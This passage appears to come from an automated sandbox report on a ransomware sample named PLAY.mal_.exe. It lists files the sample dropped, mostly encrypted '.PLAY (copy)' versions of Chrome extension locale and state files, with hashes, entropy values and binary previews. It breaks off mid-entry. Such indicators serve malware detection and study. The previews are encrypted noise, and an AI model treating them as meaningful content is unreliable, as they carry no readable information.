        Preview:.j......[.............#..G6.n..'....8.......T..U.|.!.I>............................]Z.....*3w.)6.?.Ao.(U...w.#{^.r.N,.%.}..C..{.w.%..@LzE-..W..k..e........U.e)..H.MiM...Zq0..X$..;.`Y.wco.....!....kf...J...0a...=...9K....d........."yc.h......r....:q..D....F.A.q......t2.#P.....'D)......a.n.J.M....@.k...U..f...N.r.~.Lt.R...^#.if...[U...=.....i'.0.bS.b ...g..(. .(..KI...}PZ=Z.$/.f..E..i..|.6@..O...y.....~..6D.H.^`..[..?p.>*..[.t..c27...g...|.....Y%.B|vj..F?.......&".j.....i|.N...P.`...z..V.k.."s.U.x5.Dz~W..\K...X.I...k....E.....$.T.+......c.3guJ1.~...A....lB.".....KP.Y...m..x&.....f5.N~....[n..\V1.....,N.ZvW/.[.Mci.Z.4.~..v....g....9a.G_O..Wo]..........;....v.-...E*5....m..[\=...$..y.h bhO....E.\.}..o...fgX{..~.G. ...G[....3..1............q%..6...,>%H...tDU....G=y.@..._.....x.A!.oa...!C..~.o.|D..R`>A.].c..c...E....N......O......K..i.....Mg.=.N..UO0#q....&<.:.RD...r\.1.M.[..b.+0..n.vOI.1..d........b>..^.~.8^.....}.Zw@Y.6h.t:3j.sy..r.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\LOG.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:BS image, Version 17610, Quantization 59316, (Decompresses to 60148 words)
        Category:dropped
        Size (bytes):1400
        Entropy (8bit):7.854092084257787
        Encrypted:false
        SSDEEP:
        MD5:920A3AD320EDB429F067B34C2B97F0B6
        SHA1:90BB1FD35AB3357F75A744C48A779FAAF2CA06A8
        SHA-256:94B2BCC7FEC51833C9758A9063B16DC631BAA2385DB08BEA899DB55F74AB251D
        SHA-512:E3E3221B4BD4DA26FC0AEB625A567CDB3D8B5C6AFA915EA6D3489C544747463C6D82FA2972E1EAC229377AC4D05730F7FB2CCC1AD5DD9B7712A3D82843D6110A
        Malicious:false
        Preview:...8...D.....|.(.'..Z....."T:..O.v.p..9a6..m.....]...E2..@..r?.f.....3.P},%.c.......+eC..f....d.!;...h.].r..KX..()O.'.[rT.<...{.2<Rz...R.....oa='Ci.....4..u....Z..|V..g...2.G....}..8./...P.g...>..^`.....s$BB..O9...5....%.9@._.....:a..S..l.m.&^...jo!F.A..Z..o.L%p......?........S|n..,...8og..!....YU.A.SXt?_....5:.z.......T..U.|.!.I>...........................XE......D......=z.%..I.F.....,_%.V#...].%.a"E.F...>..........D>.{.sX..r.]~..Fd.[.Ii..j..}.l....]c....[>......eE...}...!....$.0z...-J...<...-...^.,....N;..C..c...s....Eb..>...x_..[..".s.......>..r.........yJk.h..E.<.........O..$d$....E^..h.m..H..D..m.$..(GM.i3VA....9....'..D..v..b..gyX.=2....o...zf....q.A..`...b.O3)T.U....u.....aO.....I...E...R...N..}u.._....3..A.d...^T..(........<....d..w<W.2.i...4(.*N.`.....'.Mw.7M..\..'....u...FYe..0%..F..x<..UGO..".....XO.9.{..Tv.=...:|......0...IJ....bE..D..$....E0.gj.N..W.F..O.Q.a..&...{.vN....C|.A...*....w.4..O...h2B..<n...H....#......@

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\LOG.old.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1400
        Entropy (8bit):7.855283662476239
        Encrypted:false
        SSDEEP:
        MD5:0654F19F31FAD45E2A0356ED3FA74D80
        SHA1:D5BBD535FA2B5F6BC69E3A7118F94787DCC65AA3
        SHA-256:49921E6C138379E0F04AC11147B7D0007F198C7E6EE77048B4A33539E763061A
        SHA-512:503D6069470F56F2846361435952E513743A58B191AF1CFAFE64592AD7F525AA12B87362BF0310F598911A6982AA27D2D1A968F087FB2FC33818AE7601BA1025
        Malicious:false
        Preview:......*............2.:jE...#.M../..-..$..;5.BI..J..>.9...ON..o>..CV..Uv. .....m.C...{..7.<..F[$5yH.0d.R....&\8...wqu.mO$S..`.=F!./.tDB.z...p8.."...}?..37....m.. Dg.K..X...". ..W.zF.......#..P.1.#.O...&....m.^.,1=h...8.y......H..KO/.{....f..:.1V....H..d.6.c.kP.6.. _..R....15..p.t....?3......)......[...../...........n...T..U.|.!.I>...........................3..|$\j3!,.....n...p...1..#..|......>..r.Z...D.....!..+.c.N.K....=..XOq."Z.#.....r..............-h.....rK2h(....'.F.._....k..G..........S..=..d....d.#...a.9.!.u*.?.....V....O5.6sM>..>..6d........0D...=*tI.AAV.z........Z...;(F..t.z.e...n....i2E..K.......j.......Pbe...J.F:.....Y?.n...^..!h@.i...>...-..6....*....X.9\.....,p.J.....'Md......%..,.oF5......n.F.f......)..!g(._..)?U]....PD....w....4...j}";..3.+.\b\.*..@............Q5Wb.7.Mt.L..s....]....O'..U)..(..M..!p..&&6.I......K.........EH.q&...<5S...^.:...P.)...I..H%8.....d...a....D...'.k.@.....=$2"..v..#.bcW..K...9bHA...xPY.Z...../+...

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1112
        Entropy (8bit):7.821605615796128
        Encrypted:false
        SSDEEP:
        MD5:2BD3BBCFFF0E9165AE36A5C164C9ED3B
        SHA1:CD45CD88769945D93B2FC2361CF981B5A559E6E2
        SHA-256:9FDA55621DE0B8155B27171C087A50C075F7B774AD4759AF04EF23C8182EEB00
        SHA-512:DDEA94D52DFE5482DF9843061F9B8C4909769760C1EC0E4F041E6AAF9C7EC49DACFED90D08B5EF2E2974ACBD6EE0C07F48489C29A3A7A85D9F5FD8219D3A2C17
        Malicious:false
        Preview:....z....Q.a.e_.J>...m...1%...._9.L.D.n.......!...T..U.|.!.I>...........................B.xkg.e..d,..l..3..t.@.(.B=p..v...u.1.J..W..@S,..U....m..J.=.....B.\W...1.6.[.s..U.ievm....q..D.>".J.u...R..Y.......&....ZG.5.w[...sS.N....O0.c.......Ds.T..6.afP....p.h..N...../...,..=..X@....r..s.l.......?.5B..._s...p.........)..bI..6.$~.R...f.im.S[.m..B.!...L.Lq......e.rp^w........I.........dK.CE\.\..m."...`....h!.~.....5=.Ss.....H..{...I...........`....R.[...T.oMq../,...3..C..zK..F.f.~<..$....\9...~.....{..d.."..u...-.%[.e......+...s..w.K.mkZCl..t....u..L.......3.8Y.....W....../+..X!.. .......:..Q..)I{..F.......;.z...l....t..).[V.z....-...az..o..;OG.C..-.&q6.a<.a.....:'`.e.'.03&..a..e.NG....F.;WH..T..M.6....b).7..R..k{..... _.|..[A..<O.(Nf.Q].5...WE.w..}....L9.U...M.z.....U..8:..L.;.{`?....R4.....b...D.r..o.........\....Z...rOJ.....hT.e.4O.E....$..(y..$.;|..V..t..&.`........}:..".....)...l*..F..C.9\>}.-!...F.y.P.!.Z.t......|...kc.h.f.....v

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\128.png.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):6056
        Entropy (8bit):7.971271364659573
        Encrypted:false
        SSDEEP:
        MD5:974E3D1AACA3B2D5EC3841F1A97A8E83
        SHA1:D6A21E7E8BE09D7ADF6987380B5A4357FEF155D0
        SHA-256:38916153C1700041D9A2BB8B7F324AA2082F43CB806A86E506773EA960269893
        SHA-512:E7334937DD99BC9FD0D2B6BC32060F2C3ABCF2745E84ABC81A6A92AE82B9EEBC729E1F97F9825FCC4F64DFECCF8781E082636D5344F0D7BC6F73BCBF91FF6C9B
        Malicious:false
        Preview:/y\.i.)...R..b...~.~...5b........g..y+[h.M.o.)<..2...qkD....D.i.w.............._.....1T,.7.f\U...7.....^.w..=d"...H.....b....@....Wgs...fN.]....2..=9.>......J>B2..}.........p.+...=a..kv>.2...r>.zlk;..36C...;g............._.......B8..P...G..Q-p.u/..`Q........l...!.....a ...(;.|.Dey.!c_..6C..._.H.5}._.4T..8.),.....OW$gC.....}.=..B;.{.7..x....Qx\:.."S?..;t.l....[.N...OY"+,.2...i.V...@.i.i..h0F.'..LN;...;.8...d.[..d.Y....R...e...8.3...Oy..>...........H...'.Oz.a..L...N..+.Kkc.........vdO....m..f>P.G...Su.....M..._.g/..`$.%.7....^g....[...a%D.o7PQa.z...,..Uo...e/........>h..OQ.B....~....O..Q+1ahQ......1.*.}..t..w..}.).>....V.<...f'....!.R.-....g...P....S.l..3_@."c...+xu1....X.A.JD.wx..........`w......+I.m...k|.8...b!...i...........x.c......}=.]...[.......K+..N.e.;.>B\............V..-y..l..{..#..?..|.\9...:lwDh.....tSB..Yc.-%X.;IcJ.....]>,3a...O4...d........(....#......=..B...G..:#6F....q6*.c~\......JB...y....lN.......#8-.T9/J...?h.....

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\af\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1848
        Entropy (8bit):7.864935357335883
        Encrypted:false
        SSDEEP:
        MD5:19520512F0365EF44B82B8C93F178FEF
        SHA1:F6176FB6845D2EFC90286093909FFB13AA2AF09D
        SHA-256:0B3F3D912A3670242C5F6D36D89A2E01F902C2CC566AEB92913AC25A9FCB24F9
        SHA-512:A1DF1968BA0FDD806B5BD2040DBE1F78B4285A66863408329698DF4D8CC6455F9556ADFC9E1734CEB6741C95DF96F352073E6B3598CE9F1855B4C835A65AD693
        Malicious:false
        Preview:"I}.A.8_....1.)..N;.h.GY......F/.lu.B..#T.....G..`.......h..^.,..%Rp.G~.}...8..w...%....A9....6..@5c.$.........A.a...x. y.........5.5.Ad.!6a.CB.z...vV..g.-7~....J.9......#).... .S...\A.Otp..&..0. A..ayho.`.OY._.e1.......[.j_).e<.)nFV..Px}.4.-....Q.J}y.E...?Z.*....g..L.b+I.......(2...Y.F....;#.....D.....W~..+....H..*Z]..z.......vR...U.t\[oo...!Q...G.AA..PG..2.&*u..fp........cH%..1.P...S..K.!..._Y-+....v*.B#bE......-X7.....v..@q..Z.a4(/}ni|....{....P..._=..q...1.J4..y.._..3Z..%.s..."=..9Q..7.......$.u..4.<....} ..a/...yq....[7.m.R..e...c....J.[.......-I..@.F;14.N..DR.7.NE.PyI.$..P.7.!L..J....H.3.....i>%i.v".}K.)g...1..TC.0j.......Cc.<.E..2.h.vf%.^.k.+A....!.Q.L...#....{.J..q...k.[.0.E.c..`E.6..1q..m..#...'...........1..-.h..r.......).-:T.'..$2v....T..U.|.!.I>.............................:..7..ii.6....'4......2.T..s..E3.....}..I].z>r:./v............5I..2...E.%.3p&a...._.3...Lyz;\..E....X.g]0;Y2}..M...9...!.,T..sG..7.......:...z....%....a%.J..&,8.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\am\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2360
        Entropy (8bit):7.920079873520752
        Encrypted:false
        SSDEEP:
        MD5:4546086CEC05E56A96D2CDB9C32296CD
        SHA1:A0A6609989402F20D07699B0EE320DEB2A8B102D
        SHA-256:2E2322B5EDE89125E97718D93CF5F4ED45CFA6E50785F1D6058ABE7734837E63
        SHA-512:BD488C1E2A0EAB6F019CF223998225BB2EC07FA44373DAAC0F4926831CA21726536EB2EE5CB0875F354DFF13CB90A1223EA89655BE1B456E1AFB00D00DDD6635
        Malicious:false
        Preview:Q.^..p.w.....D.5....A...O......N./-%?p...Ea.H..|...6W...4.x..)p%.z..%.:..)..gx.......s...+......_....+...GK.D..:.R..8.w.A..F6!...0C....K$9.....^3%8..........*b$..<.....$..r.6...s.% uV)x.%?.r&..9X7_....Z.R.N....Z!...\!\.=....].Cf.....@....+t..=...`!.i.m...eU..cF.b9s.]...*...&..C...B.mJ><-=....(..-......-......9...%..s..@..Y[f.9E...\.R.e.......n.'o...T$@....ws.v.A..M...s..1...O..........;...8.C........t...K...\.tY.T.\&K.b....,..fxL...V0d....6..7..`.....N{.h.l!.!NZ...9.|.....j!Tt.J...h.T'e..~....u...s.a...:\....?Z...?......... ...].bH..LP.EG.b.Lr...F...b{...m$...V~d.....m..|....G.wI.S...b.}..&.`uU.|.4[.Lqs.....n.C&...@..h..GS.)3.R...[.......?.D?{'...p.l..h|..}..*..2....[....B.....$W.=....n..z...5rW...%.Rn..i/.l......a.......|..T=.GL.)cI....J.3.9 ..... ..C..G"....t..<.....~V.._.M..~....6...b.....)...5..+......B.e..vg.d.:.vQ.1..L......o..C~D.d......-..#.".v..E.....HD.u.VD.X?..M.B.C...L...._..>.....Wp..*....D)W.,T.qh..\.8....w.g.2..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ar\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2312
        Entropy (8bit):7.915884256951962
        Encrypted:false
        SSDEEP:
        MD5:90C379BE312D58B164DB7565C50D099E
        SHA1:856D00436B3DC3B696825E22EFF1EFFE6E499CDD
        SHA-256:23C3443DF136C224483F5BC884D4BA731811E62BE2DE97971C76A1C26C22F7A2
        SHA-512:DE9F4CF2554206162F7821206749E091FB48551BAC082C9A807465D160A0318A6D0DF94865F59A9429391453FB60A5D76C47F364DD71E69FDA5CCE43382F578B
        Malicious:false
        Preview:m..+.S.s(.y8..xE}Il....*.[.m......osV...h<r....@.......s.Z{.3i....r...!I9.d$.~M._.f....l....}...c.....R.....1E.H..3..la......2...'8.}.)0.........<..F5..qr......5.JO.VE0`s[W8E........W....{...gJF........f..G.A.9.b.Q..e}&aj..N.LO.c.M.P......pU..F.U..D..+..WH.e...;.V..._...J}D.".f..r..VWn.(....o.W..J...$.oD.c.....eb.}...UU..)..a...,+...".S....r.,Jrf.G.b.R.........W.A...ba:..`&...P:E..t...>.".~O.v.m....PrcU.+......a.|.,........U...Y0.q...bx.4aX.'.&ax.Uk\P.1...W..h.6.p.....O!..-^@IK5.-...4N..4Yz.wR[...n#...>M7qSmf.....3...'.....)..F..q.>..!.....`...S.^ .......[...0...........J..5...B..K.....N..o....!}......l.BI..E!......`^.n...e...Z..w...D.L.pX........dr..Q.-....LG....}fu....N....@...(qY|.Qw.H..#=....H...>7.w\4p.s.+..rD5.d).)G'...o...c......W.Jbs.'.W.P=cF..,.....D......3jv._Z..."l.<..p........P".....-.fg...5*....&..[...g].s?20.>......>.m...m....P^]@.T......6[.5H.'!3..s.>.....K....P...T..:FAN....|..>U.J:k..t.P..{.i..M.-*Y.p.#..0....

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\az\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2056
        Entropy (8bit):7.904406036556867
        Encrypted:false
        SSDEEP:
        MD5:9F4223B8FD28436EF493770B102C0FA2
        SHA1:CFF59DB5012478568333B04F8ADC49B44F4F5B2F
        SHA-256:D6BA3EF3AF9C109DD6D42C68886974155FC5B2C9FE3B1AFCA9F87A2252B66AF6
        SHA-512:17925D68C28F09A0B585BE90D0AB32C3223322CF87CF596CB5691E213776D4B278FF136C266604141971F714E4934584F7BA6C8FD6630484AAF174ED901C3AC3
        Malicious:false
        Preview:.Dt.e..6&.*wZ... ....>.+.G.".fK..6..Q.~2.q...a...2V..$>."N.Bn.............y.._1}s....M..&.Qul<.n........"'.Hu.2..\`.<....3..*...l.</..I......4. ._.~...9}v..w..../...W.#; r..-~.I......aXQ.|..`..A.n+...b.>8WZ.K9........-..P.+..F1.&...w).U.D.8...a."55..@.%...F..b....548....l!........>g.].sz....x..)....6"..3l...w.P.b{+..#..^...6.y..k.L..!....Y........Nw....k~....C.$.@C....0..E....}..Y*J.e...........@.]~.9@1.:&.....t..e....5FRwC..,.V.....M.x...Z.&{*N..?q&`..7eL..n.;.nA....X.R,.\....)...6..}..}xBH..%....b'@.......8A..DF..3 W.;{..8s.]...../o\"..TbB.T..ov..E9....S*..../F..i...n1.E..5...qx...g....[.Z.~[cw?.&+U...[..'...6..~.C.....fO.......wz.[.f..*.......9A.4..Y..:.....u"[9c%...cM+>.........sGz.}..Xux.X....6XT...wbT......wU.7v.t.R.hO.6'......`.&.G./..5...).T...8=2./.-S9..S./...Kxf....x.%."b.7:......p."./........^....#o.g..A2.i...4=.jYu5.-.>Q....L.k...g.F....x...e{mNj.......U..?{...f..msH.4,.a.F..~..]..P..}.y.r..i.8.A.o.....^.)...PM....s%.D.O...T..U.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\be\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4184
        Entropy (8bit):7.947251765421575
        Encrypted:false
        SSDEEP:
        MD5:524997C0815E3DD38FC237DA6BA7B04F
        SHA1:889FC3B727EE0883C731D25A80DB8B2622804568
        SHA-256:D7AD764F77FA72976443B8C278FE229107F055E2ACB00AAC645540515ECD08E6
        SHA-512:25E2FA7E19283FCB5701040427098840F5FF5DCBFDF6EFA88CFCB2D7827DD78DA087D9BBCBDCD00EE065BFB5AEC243943D6C98CAF163A9F369500B8EA24E5C08
        Malicious:false
        Preview:@ z......."=.......+.S..&..ZI....LM......A.3.S.....2R~A.M.......zG...g,^.!9...X.....,.+....b.<[.....0...D.....fn.m,q*.E.F.(....#...s.....S..V.W...V...`..~...........t....)...RIx!.K@...M;../~M....dP.$....a<...........>.(.~.)...f..K..7..zw....w@..bvd.....*=......j...=..m....c....^T.[quO...~r..".....~...9...r:cck.P..P.I.L*..y..:x.......*...8O....I.yEe.U.;>.=+..Y...........7....U[.(.3.uG..*.O..H>.....Q.,.[..Y..L...s.).....Ba.P.....4..z......h_]E.(..c<?..V..E........*.@.@.TF~._.M.C...D.H.c./....(....A.....}*.....=..%4..8...b...N......._...u..y.%}.....#.."..Q.A.........}....|..5..`!..O.&..H........>..@.q>..a...L...x*Y~....F.^.,.....BH.....9*T.8.i......#...U.......^"C..cp..+S..ej.......;.b.#uc.9/....{.S.V.Ww..O.........x.....Z!.lk.1l....H..=..@M>{O.9.n..v.p..\i.....U.y.....6.>%..\6.......-.c.#A|......^...g<.o-...!.&. ..._....W..se....o..zoF.X..Ri.+.qR.uk....k..f....S..h.....l4....1...R.U...t......Q.@..IWP...z.Y..7~U...d..3....c.A.....#'......

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\bg\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2456
        Entropy (8bit):7.922323980102477
        Encrypted:false
        SSDEEP:
        MD5:48CB14CABE85A26B2DBBB943385B4BA2
        SHA1:07F0562109082AD830FDAB4E5F32B7AF6AB54B54
        SHA-256:7067B14490E48D3FCC506F25EBDB4DE74DC5848A5697C090D8D905F19E0DACD5
        SHA-512:34C444B62297CFCEC60DFE1D27BA05D39459F4A7783D6BD7624DFE21063C1EC69FF757874BC11C3E9D03B94E7DB5BF88CFFA0DCCDD017DEBAD083F8D4A6E6CD9
        Malicious:false
        Preview:.Y...d.....;..h..r.">u.....|....B...Q....]...X..U]u.....o.T..I...1o.z.....5..,`r.=..BV.K."Su....1'..mF.YB9.B...&........E...8|.Bj..,...s^.?.}<.L........q.$.K.....W}.W....X.Ez....a.~...ts..I...x.....n Q.~.|..hzsl..;w.......E><..l...."{..X*.v.F.NR..9..Q....?...~..........y'vp.!.{....m...@...OK!.?....<Lxvp.........L..1..B..%...c.b.mC;F.R.jU1G2(....g..'.j.l..XJ....v..s~....|.I&S......).......Po..U.|. .....h......Cx`...{c..S.m..@.G._....ki..HwU...%g.A..d4n4.:."...u...${...v..q.}>..*!.(..|[..6.b....u.U.!.....iG#...j}9.Z.aQvE..g.e..X*c...vNv.*].h`..w...naw..^'.A.|OR(..Y.s.....Qm.}.IS.....;....w...."...zu..-KM.._'.y..v=.C.....i}.......-:..L:.....m...........A..5.M.;.."..G.....-..S.I....1..dQP.....S....L6..l..l.]d].!....OO.o.Wg!.I`d...7....1...@O~.q.._l...j.../.g.6>..n..q.g....f.h{.(.....L|...a....g....rV..n#.4+6#N.#.......*.z.O8.......e(\.....[..m...<...r..k .._z..Q[....P...._.|..YGn.h/.|..%.C....n.....G..a..[..}r..aD..Dr...y9.y.....d...e.S.. ..]

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\bn\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2840
        Entropy (8bit):7.930751759285476
        Encrypted:false
        SSDEEP:
        MD5:D67DFEB774C912BB5265F30536F02116
        SHA1:288B43304112BD692E606E25240F9EA032A48E2C
        SHA-256:A97812D36023B8C0DFF75EE22CC5CF0457618E3333255EB0B5CFA211407A10FF
        SHA-512:F4B651CDEB4ABE4FF2BA429823FC9C512CD520DCB69EB18E45AD51728DF905A476C5163E9AE82112B0B36FA3E3260FC0D5B0FD08092303858818B7D8F8B3897B
        Malicious:false
        Preview:.G...U.6....0.i...I..J......nb..8... ....+................a...o....s....4#.0......z......:.o.?Y.0......A..t...j...%E./...vz.|.`i..e.W.PR".|...hBg.."..G......._...\.S9.F..z.x.|.ijx....y..Sz...\.._z.....@[+...../.i.X.a.%7..cr.&#]...~c..._qL..*..f*.q.'|"..m...j.7..S.....v..]..On.......Z1N..&_...X..M..>.....].=..........,..6..Y.7*.<5........n..Y....E......xI.. j>.{.......D.hk.\.6...;...'.,..|.b.R.>..m...../.z.VO<Yq..].=Y.|..,.v.Jv..a..!s..c....r....g..#.o...q.....<..v.e+..y."..u[.Pv..v...T..#.....F..).b..,.g.C.E...r3.......8^>..v5=LS^Rm..c..Y....@.B.H"~.e..'.^..Y...rK.&.7.;..J@5]H..+....%.V..!..{.56,....o$..X........E.h..#.L}.u.HK...Q.A...(.u..gj..o...z.&....H6bWc.$ iG...^..T.=".r...4......gQ../.h...&K`...Iu#Q..[r.#Mhe@...w.S.'..-...z.\S.....J..g..._Z.GC.,,).)..`.".F..%..Cy..q..#^..1*.....5&../...<-..A*..k..1.p..Lk..\=.L..kt..xs.A..<....(..?....%o.....+A.x7e..,.o.^+.K`h.8...p.'....(g.\....E...).0.....x.U.hZ.z...xE.).A...)..t....D....$/%....I.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ca\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2008
        Entropy (8bit):7.89476032629379
        Encrypted:false
        SSDEEP:
        MD5:A58AE6A6C46BD4C37A45CF06B2FDA306
        SHA1:A15EFDFEE54C94075FE010F97729FFCD4D66DFCA
        SHA-256:06D9D23C558D2CFFE411A4EEF9B4364F58FB54A47ABC8C921ABC31F2FD658A28
        SHA-512:795DE0FCF845CCF97A176E9EDBA3C6E35F1A1CE2B93BB33DCE323E9F3211E5841AE7EF285960DD6106BEF6D9853046AB94037D73105292074A8324DDF24260C7
        Malicious:false
        Preview:.,]DT9.xd...k._.?.>..C.{@utg....5...cQ..2:..7&.-......k..R.D."h.2...2.Q..(@.O'NU.-....l..0h..y$..v.p.........o..0.;..nQ0.!...@-...`/..rH...2...4)JH\6.......N...b7.8.."..".,..W,..I..|.L..][....J.8..a..o]{/.z..M.){..8.>\B..+..8........&g_...i.+....7.K.]....R.i...uL5...F....El.....l....(`w.).]..j=.-..\....7.......1..z}.h....>.....C*I.....yu.9.H.z..Q?s.[t.*.6.8Q+......b./."awX......H....es.#a@tc.._..Q7p.y.....e...._J.Q..P,..........&/-......jk.@..~.9....G..}.$.....2.,....Mvu.".C.9.~G....s.......M..A....;M.C.!..xT...].`~.......!tE..N1.....\.....c..........^k...-:...d.....z..f..4.......g..Q...~.B]..x).1 .y[L.WH+TO..&._.u....(..D....'%.qH...^...xl1....j6."..3`.~c.?yt........}E...>........v.D..CD.\I"Q:o......\F...J...].X....8..^..*.......W~..Y._bP..5..RY.Q=..i..~......r..\..j-,.E......Q.....Ql.O'.Ux.y(.eW.(E.V\..`...>z...a.s...B.K".AI\.@.7........A\(]...Pn..>`..w.W.U.ty^...;.~sn`/.l.....R....T..U.|.!.I>..............................1..x.lJ.~..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\cs\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1992
        Entropy (8bit):7.887653556509504
        Encrypted:false
        SSDEEP:
        MD5:435274742EC629CB85C38FDB848C6182
